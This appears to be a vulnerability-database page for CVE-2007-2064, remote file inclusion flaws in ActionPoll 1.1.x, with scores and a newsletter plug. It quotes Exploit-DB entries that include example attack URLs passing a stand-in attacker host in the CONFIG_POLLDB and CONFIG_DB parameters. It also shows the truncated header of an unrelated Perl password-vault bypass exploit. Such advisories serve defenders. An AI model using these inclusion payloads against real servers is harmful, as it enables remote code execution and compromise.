CVE-2007-2064
published 2007-04-18CVE-2007-2064: Multiple PHP remote file inclusion vulnerabilities in Robert Ladstaetter ActionPoll 1.1.0, and possibly 1.1.1, allow remote attackers to execute arbitrary PHP…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.09%
86.1th percentile
Multiple PHP remote file inclusion vulnerabilities in Robert Ladstaetter ActionPoll 1.1.0, and possibly 1.1.1, allow remote attackers to execute arbitrary PHP code via a URL in (1) the CONFIG_POLLDB parameter to actionpoll.php or (2) the CONFIG_DB parameter to db/DataReaderWriter.php, different vectors than CVE-2001-1297.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| actionpoll | actionpoll | — | — |
| actionpoll | actionpoll | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TEKUVA - Password Reminder Authentication Bypass
exploitdb·2009-11-21
CVE-2009-4781 TEKUVA - Password Reminder Authentication Bypass
TEKUVA - Password Reminder Authentication Bypass
---
#!/usr/bin/perl
# Exploit: TEKUVA Password Reminder Authentication Bypass
# Date: [11/19/2009]
# Author: iqlusion [[email protected]]
# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html
# Version: 1.0.0.1
# Info: TEKUVA Password Reminder is a password vault that allows you to store all
# your credentials in one spot and all you have to remember is a single 'main'
# password to access your vault. Unfortunately, the vault is actually an
# Access 2007 database that is protected by a password which is hard coded into
# the program, not your main password.
#
# This script connects to the database using the hard coded db password and dumps
# everything into an HTML table, bypassing the need to enter th
Exploit-DB
Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion
exploitdb·2007-04-16
CVE-2007-2064 Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion
Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/23504/info
Actionpoll is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects Actionpoll 1.1.0; other versions may also be vulnerable.
http://www.example.com/[script path]/actionpoll.php?CONFIG_POLLDB=http://evil_scripts?
Exploit-DB
Actionpoll 1.1.1 - '/db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion
exploitdb·2006-10-30
CVE-2007-2064 Actionpoll 1.1.1 - '/db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion
Actionpoll 1.1.1 - '/db/DataReaderWriter.php?CONFIG_DB' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/20788/info
Actionpoll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Version 1.1.1 is reported affected; other versions may be affected as well.
http://www.example.com/db/DataReaderWriter.php?CONFIG_DB=evilscripts?
No writeups or analysis indexed.
http://securityreason.com/securityalert/2587http://www.securityfocus.com/archive/1/465871/100/0/threadedhttp://www.securityfocus.com/bid/20788http://www.securityfocus.com/bid/23504https://exchange.xforce.ibmcloud.com/vulnerabilities/33691http://securityreason.com/securityalert/2587http://www.securityfocus.com/archive/1/465871/100/0/threadedhttp://www.securityfocus.com/bid/20788http://www.securityfocus.com/bid/23504https://exchange.xforce.ibmcloud.com/vulnerabilities/33691
2007-04-18
Published